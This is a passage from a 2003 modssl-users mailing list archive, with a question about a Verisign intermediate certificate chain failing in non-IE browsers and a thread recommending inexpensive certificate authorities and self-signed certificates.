Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Lentila de Vultur" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I have problems with a Verisign Global-ID certificate installed on a very
old system. The Intermediate CA was installed according to the documentation on
Verisign's website.
The server's certificate is recognized only by Internet Explorer (tested
versions 5.5 and 6). 
Other browsers do not recognize the certificate - they complain that the
site's certificate is incomplete (tested Mozilla, Mozilla Firebird, Opera).
Errors in the ssl_engine_log:

[error] SSL handshake failed (server xxx:443, client a.b.c.d) (OpenSSL
library error follows)
[error] OpenSSL: error:14094418:SSL routines:SSL3_READ_BYTES:tlsv1 alert
unknown ca


I think the problem is related to the intermediate certificate but I can't
identify it.

Entries in ssl_engine_log while starting Apache:

[info]  Server: Apache/1.3.9, Interface: mod_ssl/2.4.10, Library:
OpenSSL/0.9.4
[info]  Init: 1st startup round (still not detached)
[info]  Init: Initializing OpenSSL library
[info]  Init: Loading certificate & private key of SSL-aware server xxx:443
[trace] Init: (xxx:443) unencrypted RSA private key - pass phrase not
required
[info]  Init: Generating temporary RSA private keys (512/1024 bits)
[info]  Init: Configuring temporary DH parameters (512/1024 bits)
[info]  Init: 2nd startup round (already detached)
[info]  Init: Reinitializing OpenSSL library
[trace] Inter-Process Session Cache (DBM) Expiry: old: 0, new: 0, removed: 0
[info]  Init: Seeding PRNG with 8 bytes of entropy
[info]  Init: Configuring temporary RSA private keys (512/1024 bits)
[info]  Init: Configuring temporary DH parameters (512/1024 bits)
[info]  Init: Initializing (virtual) servers for SSL
[info]  Init: Configuring server xxx:443 for SSL protocol
[trace] Init: (xxx:443) Creating new SSL context (protocols: SSLv2, SSLv3,
TLSv1)
[trace] Init: (xxx:443) Configuring RSA server certificate
[info]  Init: (xxx:443) RSA server certificate enables Server Gated
Cryptography (SGC)
[trace] Init: (xxx:443) Configuring RSA server private key
[trace] Init: (xxx:443) Configuring server certificate chain (0 CA
certificates)
                                                                          
^^^^^^^^^^^^^^^^^^^^

What does "0 CA certificate" mean?


In httpd.conf I have:

SSLCertificateFile /path/to/server.crt
SSLCertificateKeyFile /path/to/server.key
SSLCertificateChainFile /path/to/intermediate.crt


Can someone help me?

TIA.

-- 
munca l-a facut pe om ... lenes.

NEU FÜR ALLE - GMX MediaCenter - für Fotos, Musik, Dateien...
Fotoalbum, File Sharing, MMS, Multimedia-Gruß, GMX FotoService

Jetzt kostenlos anmelden unter http://www.gmx.net

+++ GMX - die erste Adresse für Mail, Message, More! +++

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov 17 20:34:51 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 13FBAA8963; Mon, 17 Nov 2003 20:34:51 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from secure.intgrp.com (66.83.182.2.nw.nuvox.net [66.83.182.2])
	by master.modssl.org (Postfix) with ESMTP id AD3BBA8934
	for ; Mon, 17 Nov 2003 20:34:33 +0100 (CET)
Received: from m45 ([10.0.0.145])
	by secure.intgrp.com (8.11.6/linuxconf) with SMTP id hAHJYQY00654
	for ; Mon, 17 Nov 2003 14:34:27 -0500
Message-ID: <00ba01c3ad41$bc663440$9100000a@intgrp.com>
From: "Eric Wood" 
To: 
Subject: OT: cheap CA certificates
Date: Mon, 17 Nov 2003 14:33:53 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Eric Wood" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Where can I get cheap/reliable certs for a Apache that IE 5.5+ clients will
authorize against?  Thawte and Verisign have outpriced themselves.

-Eric Wood

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov 17 20:58:08 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A8DBCA8963; Mon, 17 Nov 2003 20:58:08 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from milquetoast.dpc.ucar.edu (milquetoast.dpc.ucar.edu [128.117.126.106])
	by master.modssl.org (Postfix) with ESMTP id A9AE6A8934
	for ; Mon, 17 Nov 2003 20:57:51 +0100 (CET)
Received: from milquetoast.dpc.ucar.edu (localhost.localdomain [127.0.0.1])
	by milquetoast.dpc.ucar.edu (8.12.8/8.12.8) with ESMTP id hAHJvngA028340
	for ; Mon, 17 Nov 2003 12:57:49 -0700
Received: (from peterb@localhost)
	by milquetoast.dpc.ucar.edu (8.12.8/8.12.8/Submit) id hAHJvnL4028338
	for modssl-users@modssl.org; Mon, 17 Nov 2003 12:57:49 -0700
Date: Mon, 17 Nov 2003 12:57:49 -0700
From: Peter Burkholder 
To: modssl-users@modssl.org
Subject: Re: OT: cheap CA certificates
Message-ID: <20031117195748.GD23478@ucar.edu>
References: <00ba01c3ad41$bc663440$9100000a@intgrp.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
In-Reply-To: <00ba01c3ad41$bc663440$9100000a@intgrp.com>
User-Agent: Mutt/1.4.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Peter Burkholder 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

http://www.geotrust.com/equifax/
On Mon, Nov 17, 2003 at 02:33:53PM -0500, Eric Wood wrote:
> From: "Eric Wood" 
> To: 
> Subject: OT: cheap CA certificates
> Date: Mon, 17 Nov 2003 14:33:53 -0500
> Reply-To: modssl-users@modssl.org
>=20
> Where can I get cheap/reliable certs for a Apache that IE 5.5+ clients wi=
ll
> authorize against?  Thawte and Verisign have outpriced themselves.
>=20
> -Eric Wood
>=20
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
--
Peter Burkholder, System Administrator
Digital Library for Earth System Education (DLESE=C2=AE -- http://www.dlese=
.org)
peterb@ucar.edu
DLESE Program Center (DPC)                               ~~~  ~~  ~~~~   __o
UCAR/DPC, P.O. Box 3000       Ph) +1-303-497-2663      ~~~  ~~~~ ~~    _`\<=
,_
Boulder, CO 80307-3000        Fx) +1 303-497-8336 ~~~~ ~~~   ~~~~     (*)/ =
(*)
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov 17 21:05:45 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8B56FA8965; Mon, 17 Nov 2003 21:05:45 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mystic1.trustcenter.de (mystic1.trustcenter.de [193.194.157.34])
	by master.modssl.org (Postfix) with ESMTP id 4B026A8937
	for ; Mon, 17 Nov 2003 21:05:29 +0100 (CET)
Received: (from root@localhost)
	by mystic1.trustcenter.de (8.11.6+Sun/8.11.6) id hAHK5Rv23449
	for ; Mon, 17 Nov 2003 21:05:27 +0100 (MET)
Received: from venus.trustcenter.de(192.168.202.4) by mystic1.trustcenter.de via csmap (V6.0)
	id srcAAAZKaaZT; Mon, 17 Nov 03 21:05:26 +0100
Received: from trustcenter.de (titan.trustcenter.de [192.168.200.244])
	by venus.trustcenter.de (8.12.9/TC TrustCenter Mailserver) with ESMTP id hAHK5NMv022787
	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=OK);
	Mon, 17 Nov 2003 21:05:26 +0100
Message-ID: <3FB92A03.7010507@trustcenter.de>
Date: Mon, 17 Nov 2003 21:05:23 +0100
From: Goetz Babin-Ebell 
Organization: TC TrustCenter AG
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030624
X-Accept-Language: de-de, de, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: OT: cheap CA certificates
References: <00ba01c3ad41$bc663440$9100000a@intgrp.com>
In-Reply-To: <00ba01c3ad41$bc663440$9100000a@intgrp.com>
Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms070501040903030509080501"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Goetz Babin-Ebell 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a cryptographically signed message in MIME format.

--------------ms070501040903030509080501
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hello Eric,

Eric Wood wrote:
> Where can I get cheap/reliable certs for a Apache that IE 5.5+ clients will
> authorize against?  Thawte and Verisign have outpriced themselves.

That depends on your definition of the terms cheap and reliable.

But we offer client and server certs
(low level client certs are still free)

Bye

Goetz

-- 
Goetz Babin-Ebell, TC TrustCenter AG, http://www.trustcenter.de
Sonninstr. 24-28, 20097 Hamburg, Germany
Tel.: +49-(0)40 80 80 26 -0,  Fax: +49-(0)40 80 80 26 -126

--------------ms070501040903030509080501
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature

MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIIkDCC
BEQwggOtoAMCAQICDwCQHgAAAAJOQu0jEgf3pTANBgkqhkiG9w0BAQUFADCBvDELMAkGA1UE
BhMCREUxEDAOBgNVBAgTB0hhbWJ1cmcxEDAOBgNVBAcTB0hhbWJ1cmcxOjA4BgNVBAoTMVRD
IFRydXN0Q2VudGVyIGZvciBTZWN1cml0eSBpbiBEYXRhIE5ldHdvcmtzIEdtYkgxIjAgBgNV
BAsTGVRDIFRydXN0Q2VudGVyIENsYXNzIDMgQ0ExKTAnBgkqhkiG9w0BCQEWGmNlcnRpZmlj
YXRlQHRydXN0Y2VudGVyLmRlMB4XDTAzMDIxMDE0NDI1MFoXDTA0MDIxMDE0NDI1MFowgaox
CzAJBgNVBAYTAkRFMRAwDgYDVQQIEwdIYW1idXJnMRAwDgYDVQQHEwdIYW1idXJnMRowGAYD
VQQKExFUQyBUcnVzdENlbnRlciBBRzEUMBIGA1UECxMLRW50d2lja2x1bmcxGjAYBgNVBAMT
EUdvZXR6IEJhYmluLUViZWxsMSkwJwYJKoZIhvcNAQkBFhpiYWJpbi1lYmVsbEB0cnVzdGNl
bnRlci5kZTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALB6adN6EChrpAbT5KV1
ceRRIDAoGnz2gsBoFI2BwJLS+RpuIZfdJOepm4crg3X6LXrMKwSF/lshFeHrVPtLzabgLGyF
SujsJP0z3u7f4XNYCGHl4UbyPkYboIP9GC/DRtsknO1YfJUy/4yKBG4VjJ4AP6vZTEQey6jm
xelsK2ek4vwRfUjs/z9UcZmtj4ipiHP6IqFyydDTLarn1jWHUu2zFnJzryZ6mXdOUPihCOFG
D+c1KFksZ1VscgDpKygTQcIg/VItmbeFkhOj9IkboOyiVKvvfhujlxmdm9ACt22MjMrB0RAb
9TR1DgXlyofwykKAK+GM8Cu8jcKaJjvfhaMCAwEAAaOB0zCB0DAMBgNVHRMBAf8EAjAAMA4G
A1UdDwEB/wQEAwIF4DA+BglghkgBhvhCAQgEMRYvaHR0cDovL3d3dy50cnVzdGNlbnRlci5k
ZS9ndWlkZWxpbmVzL2luZGV4Lmh0bWwwEQYJYIZIAYb4QgEBBAQDAgWgMF0GCWCGSAGG+EIB
AwRQFk5odHRwczovL3d3dy50cnVzdGNlbnRlci5kZS9jZ2ktYmluL2NoZWNrLXJldi5jZ2kv
OTAxRTAwMDAwMDAyNEU0MkVEMjMxMjA3RjdBNT8wDQYJKoZIhvcNAQEFBQADgYEAObOwuCFG
0HmVvCm8llpJ3qsBqtZgFyUT0wuz8JG6CZjHn5lwvOg+8m8huKrE5oGEQIo9EwLcFLDNVsxB
CiwjX2juU3JQl2Hs2smUyHkOqg+W0COetRp+PcDAk4hk0Mth5A3bDy3FrzyhbjpYjAZTvnsY
9+QYmJm5cGWBJK9I7kIwggREMIIDraADAgECAg8AkB4AAAACTkLtIxIH96UwDQYJKoZIhvcN
AQEFBQAwgbwxCzAJBgNVBAYTAkRFMRAwDgYDVQQIEwdIYW1idXJnMRAwDgYDVQQHEwdIYW1i
dXJnMTowOAYDVQQKEzFUQyBUcnVzdENlbnRlciBmb3IgU2VjdXJpdHkgaW4gRGF0YSBOZXR3
b3JrcyBHbWJIMSIwIAYDVQQLExlUQyBUcnVzdENlbnRlciBDbGFzcyAzIENBMSkwJwYJKoZI
hvcNAQkBFhpjZXJ0aWZpY2F0ZUB0cnVzdGNlbnRlci5kZTAeFw0wMzAyMTAxNDQyNTBaFw0w
NDAyMTAxNDQyNTBaMIGqMQswCQYDVQQGEwJERTEQMA4GA1UECBMHSGFtYnVyZzEQMA4GA1UE
BxMHSGFtYnVyZzEaMBgGA1UEChMRVEMgVHJ1c3RDZW50ZXIgQUcxFDASBgNVBAsTC0VudHdp
Y2tsdW5nMRowGAYDVQQDExFHb2V0eiBCYWJpbi1FYmVsbDEpMCcGCSqGSIb3DQEJARYaYmFi
aW4tZWJlbGxAdHJ1c3RjZW50ZXIuZGUwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
AQCwemnTehAoa6QG0+SldXHkUSAwKBp89oLAaBSNgcCS0vkabiGX3STnqZuHK4N1+i16zCsE
hf5bIRXh61T7S82m4CxshUro7CT9M97u3+FzWAhh5eFG8j5GG6CD/Rgvw0bbJJztWHyVMv+M
igRuFYyeAD+r2UxEHsuo5sXpbCtnpOL8EX1I7P8/VHGZrY+IqYhz+iKhcsnQ0y2q59Y1h1Lt
sxZyc68mepl3TlD4oQjhRg/nNShZLGdVbHIA6SsoE0HCIP1SLZm3hZITo/SJG6DsolSr734b
o5cZnZvQArdtjIzKwdEQG/U0dQ4F5cqH8MpCgCvhjPArvI3CmiY734WjAgMBAAGjgdMwgdAw
DAYDVR0TAQH/BAIwADAOBgNVHQ8BAf8EBAMCBeAwPgYJYIZIAYb4QgEIBDEWL2h0dHA6Ly93
d3cudHJ1c3RjZW50ZXIuZGUvZ3VpZGVsaW5lcy9pbmRleC5odG1sMBEGCWCGSAGG+EIBAQQE
AwIFoDBdBglghkgBhvhCAQMEUBZOaHR0cHM6Ly93d3cudHJ1c3RjZW50ZXIuZGUvY2dpLWJp
bi9jaGVjay1yZXYuY2dpLzkwMUUwMDAwMDAwMjRFNDJFRDIzMTIwN0Y3QTU/MA0GCSqGSIb3
DQEBBQUAA4GBADmzsLghRtB5lbwpvJZaSd6rAarWYBclE9MLs/CRugmYx5+ZcLzoPvJvIbiq
xOaBhECKPRMC3BSwzVbMQQosI19o7lNyUJdh7NrJlMh5DqoPltAjnrUafj3AwJOIZNDLYeQN
2w8txa88oW46WIwGU757GPfkGJiZuXBlgSSvSO5CMYIEdzCCBHMCAQEwgdAwgbwxCzAJBgNV
BAYTAkRFMRAwDgYDVQQIEwdIYW1idXJnMRAwDgYDVQQHEwdIYW1idXJnMTowOAYDVQQKEzFU
QyBUcnVzdENlbnRlciBmb3IgU2VjdXJpdHkgaW4gRGF0YSBOZXR3b3JrcyBHbWJIMSIwIAYD
VQQLExlUQyBUcnVzdENlbnRlciBDbGFzcyAzIENBMSkwJwYJKoZIhvcNAQkBFhpjZXJ0aWZp
Y2F0ZUB0cnVzdGNlbnRlci5kZQIPAJAeAAAAAk5C7SMSB/elMAkGBSsOAwIaBQCgggJ7MBgG
CSqGSIb3DQEJAzELBgkqhkiG9w0BBwEwHAYJKoZIhvcNAQkFMQ8XDTAzMTExNzIwMDUyM1ow
IwYJKoZIhvcNAQkEMRYEFNevXwWtuWuBQvQFnEQUz0IrbaraMFIGCSqGSIb3DQEJDzFFMEMw
CgYIKoZIhvcNAwcwDgYIKoZIhvcNAwICAgCAMA0GCCqGSIb3DQMCAgFAMAcGBSsOAwIHMA0G
CCqGSIb3DQMCAgEoMIHhBgkrBgEEAYI3EAQxgdMwgdAwgbwxCzAJBgNVBAYTAkRFMRAwDgYD
VQQIEwdIYW1idXJnMRAwDgYDVQQHEwdIYW1idXJnMTowOAYDVQQKEzFUQyBUcnVzdENlbnRl
ciBmb3IgU2VjdXJpdHkgaW4gRGF0YSBOZXR3b3JrcyBHbWJIMSIwIAYDVQQLExlUQyBUcnVz
dENlbnRlciBDbGFzcyAzIENBMSkwJwYJKoZIhvcNAQkBFhpjZXJ0aWZpY2F0ZUB0cnVzdGNl
bnRlci5kZQIPAJAeAAAAAk5C7SMSB/elMIHjBgsqhkiG9w0BCRACCzGB06CB0DCBvDELMAkG
A1UEBhMCREUxEDAOBgNVBAgTB0hhbWJ1cmcxEDAOBgNVBAcTB0hhbWJ1cmcxOjA4BgNVBAoT
MVRDIFRydXN0Q2VudGVyIGZvciBTZWN1cml0eSBpbiBEYXRhIE5ldHdvcmtzIEdtYkgxIjAg
BgNVBAsTGVRDIFRydXN0Q2VudGVyIENsYXNzIDMgQ0ExKTAnBgkqhkiG9w0BCQEWGmNlcnRp
ZmljYXRlQHRydXN0Y2VudGVyLmRlAg8AkB4AAAACTkLtIxIH96UwDQYJKoZIhvcNAQEBBQAE
ggEAYgT/URiyp235W75p0PpM+o8v/k9adGmdkqOBkwgLFlUuLDxC9Mz4/ITMht1HrjhEdyWz
XC3Uj3JFdDkljTbOAgm32muqQp0sYrHvEf6VEuIT5CRz1SVvva8gRxvIeTMPt7qejDWsmoRn
JWpRDtH0Z5dRn31972Nkdq5Db15znF584akpaKogNyKenb8Kaaex/OZn99/OlRA4Y3+vvuUd
tO/5o137dqIG2yaQGrQCMtxOzC+G4L/vkoBO9K+4O6SKWBsHoNlHzpaoQTWf0O2Qv+LmDfFN
t9HAUJZoRoEONpXN7qmcKDrtIkbwOQ1H3Vt3mmDSEt8LCnl77Wh7x7mjvwAAAAAAAA==
--------------ms070501040903030509080501--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov 17 21:07:56 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 43863A8A49; Mon, 17 Nov 2003 21:07:56 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sottmxssm.entrust.com (sottmxssm.entrust.com [216.191.252.10])
	by master.modssl.org (Postfix) with ESMTP id 75A68A8963
	for ; Mon, 17 Nov 2003 21:07:39 +0100 (CET)
Received: from sottguard01.entrust.com (sottguard01.entrust.com [10.4.61.249])
	by sottmxssm.entrust.com (Switch-2.2.8/Switch-2.2.4) with SMTP id VAHK17BC000017E8
	for ; Mon, 17 Nov 2003 15:07:47 -0500
Received: (qmail 17666 invoked by uid 111); 17 Nov 2003 20:06:36 -0000
Received: from Robert.Lagana@entrust.com by sottguard01.entrust.com with AmikaGuardian-Server-2.1.0 (Processed in 1.401828 secs); 17 Nov 2003 20:06:36 -0000
Received: from unknown (HELO SOTTMXS01.entrust.com) (10.4.61.7)
  by sottguard01.entrust.com with SMTP; 17 Nov 2003 20:06:34 -0000
Received: by sottmxs01.entrust.com with Internet Mail Service (5.5.2657.72)
	id ; Mon, 17 Nov 2003 15:07:33 -0500
Message-ID: 
From: Robert Lagana 
To: "'modssl-users@modssl.org'" 
Subject: RE: cheap CA certificates
Date: Mon, 17 Nov 2003 15:07:30 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2657.72)
Content-Type: text/plain
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Robert Lagana 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

http://www.sslreview.com/content/index.html
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov 18 10:02:08 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A6188A897C; Tue, 18 Nov 2003 10:02:08 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from simon.trewtech.com (ns.trewtech.com [67.100.242.162])
	by master.modssl.org (Postfix) with ESMTP id A7778A8940
	for ; Tue, 18 Nov 2003 10:01:49 +0100 (CET)
Received: (qmail 18681 invoked from network); 17 Nov 2003 21:13:08 -0000
Received: from unknown (HELO DR150.drintl.local) (207.188.207.238)
  by simon.trewtech.com with SMTP; 17 Nov 2003 21:13:08 -0000
Date: Mon, 17 Nov 2003 15:11:42 -0500
From: James Treworgy 
X-Mailer: The Bat! (v1.62i) Personal
Organization: Trewtech
X-Priority: 3 (Normal)
Message-ID: <6324208281.20031117151142@trewtech.com>
To: Goetz Babin-Ebell 
Cc: modssl-users@modssl.org
Subject: Re[2]: OT: cheap CA certificates
In-Reply-To: <3FB92A03.7010507@trustcenter.de>
References: <00ba01c3ad41$bc663440$9100000a@intgrp.com>
 <3FB92A03.7010507@trustcenter.de>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: James Treworgy 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Thawte is pretty cheap. $127 bucks through their ISP channel (anyone
can sign up) for a regular web cert, I am not sure you can do much better.

If it's not worth $127 a year, then I assume it's not for profit, e.g.
for internal use only or for a small number of users. In that case,
just use self-signed certificates. They're no less secure, they just
pop up a warning. Advise your users to add them to their root store
the first time they connect to your site and even that won't happen
anymore. We do this for all our internal secured sites.

-- Jamie

Monday, November 17, 2003, 3:05:23 PM, you wrote:

GBE> Hello Eric,

GBE> Eric Wood wrote:
>> Where can I get cheap/reliable certs for a Apache that IE 5.5+ clients will
>> authorize against?  Thawte and Verisign have outpriced themselves.

GBE> That depends on your definition of the terms cheap and reliable.

GBE> But we offer client and server certs
GBE> (low level client certs are still free)

GBE> Bye

GBE> Goetz




-- 
Best regards,
 James                            mailto:jamie@trewtech.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov 18 14:12:19 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9FCD1A8965; Tue, 18 Nov 2003 14:12:19 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.gmx.net (pop.gmx.de [213.165.64.20])
	by master.modssl.org (Postfix) with SMTP id 3384BA8940
	for ; Tue, 18 Nov 2003 14:12:03 +0100 (CET)
Received: (qmail 9277 invoked by uid 0); 18 Nov 2003 13:11:56 -0000
Received: from 62.104.157.85 by www54.gmx.net with HTTP;
	Tue, 18 Nov 2003 14:11:56 +0100 (MET)
Date: Tue, 18 Nov 2003 14:11:56 +0100 (MET)
From: "Lentila de Vultur" 
To: modssl-users@modssl.org
MIME-Version: 1.0
References: <13230.1068646166@www35.gmx.net>
Subject: Re: chain certificates
X-Priority: 3 (Normal)
X-Authenticated: #11527116
Message-ID: <21162.1069161116@www54.gmx.net>
X-Mailer: WWW-Mail 1.6 (Global Message Exchange)
X-Flags: 0001
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Lentila de Vultur" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

hi,

problem solved. it was a stupid mistake on our side.

> 
> I have problems with a Verisign Global-ID certificate installed on a very
> old system. The Intermediate CA was installed according to the
> documentation on
> Verisign's website.
> The server's certificate is recognized only by Internet Explorer (tested
> versions 5.5 and 6). 
> Other browsers do not recognize the certificate - they complain that the
> site's certificate is incomplete (tested Mozilla, Mozilla Firebird,
> Opera).
> Errors in the ssl_engine_log:
> [...]

-- 
munca l-a facut pe om ... lenes.

NEU FÜR ALLE - GMX MediaCenter - für Fotos, Musik, Dateien...
Fotoalbum, File Sharing, MMS, Multimedia-Gruß, GMX FotoService

Jetzt kostenlos anmelden unter http://www.gmx.net

+++ GMX - die erste Adresse für Mail, Message, More! +++

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov 18 14:55:11 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 368CDA897C; Tue, 18 Nov 2003 14:55:11 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nt01.mercantec.com (mercantec.mercantec.com [205.243.142.2])
	by master.modssl.org (Postfix) with ESMTP id 86BDDA8940
	for ; Tue, 18 Nov 2003 14:54:54 +0100 (CET)
Received: by nt01.merc.local with Internet Mail Service (5.5.2650.21)
	id ; Tue, 18 Nov 2003 07:54:51 -0600
Message-ID: 
From: kwills@mercantec.com
To: babin-ebell@trustcenter.de
Cc: modssl-users@modssl.org
Subject: RE: Re[2]: OT: cheap CA certificates
Date: Tue, 18 Nov 2003 07:54:50 -0600
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: kwills@mercantec.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Here is one comparison of different SSL certificate choices and their
prices:

http://www.whichssl.com/ssl-certificate-comparison.html


--Kevin

-----Original Message-----
From: James Treworgy [mailto:jamie@trewtech.com]
Sent: Monday, November 17, 2003 2:12 PM
To: Goetz Babin-Ebell
Cc: modssl-users@modssl.org
Subject: Re[2]: OT: cheap CA certificates


Thawte is pretty cheap. $127 bucks through their ISP channel (anyone
can sign up) for a regular web cert, I am not sure you can do much better.

If it's not worth $127 a year, then I assume it's not for profit, e.g.
for internal use only or for a small number of users. In that case,
just use self-signed certificates. They're no less secure, they just
pop up a warning. Advise your users to add them to their root store
the first time they connect to your site and even that won't happen
anymore. We do this for all our internal secured sites.

-- Jamie

Monday, November 17, 2003, 3:05:23 PM, you wrote:

GBE> Hello Eric,

GBE> Eric Wood wrote:
>> Where can I get cheap/reliable certs for a Apache that IE 5.5+ clients
will
>> authorize against?  Thawte and Verisign have outpriced themselves.

GBE> That depends on your definition of the terms cheap and reliable.

GBE> But we offer client and server certs
GBE> (low level client certs are still free)

GBE> Bye

GBE> Goetz




-- 
Best regards,
 James                            mailto:jamie@trewtech.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 19 12:39:26 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id DF7DDA8972; Wed, 19 Nov 2003 12:39:25 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.slb.com (nammta01.sugar-land.nam.slb.com [163.188.150.130])
	by master.modssl.org (Postfix) with ESMTP id 92177A8934
	for ; Wed, 19 Nov 2003 12:39:11 +0100 (CET)
Received: from conversion-daemon.nammta01.sugar-land.nam.slb.com by
 nammta01.sugar-land.nam.slb.com
 (iPlanet Messaging Server 5.2 HotFix 1.14 (built Mar 18 2003))
 id <0HOL00401JLRB8@nammta01.sugar-land.nam.slb.com> for
 modssl-users@modssl.org; Wed, 19 Nov 2003 11:38:14 +0000 (GMT)
Received: from srv003snap.naples.eur.slb.com
 (srv003snap.naples.eur.slb.com [134.32.195.159])
 by nammta01.sugar-land.nam.slb.com
 (iPlanet Messaging Server 5.2 HotFix 1.14 (built Mar 18 2003))
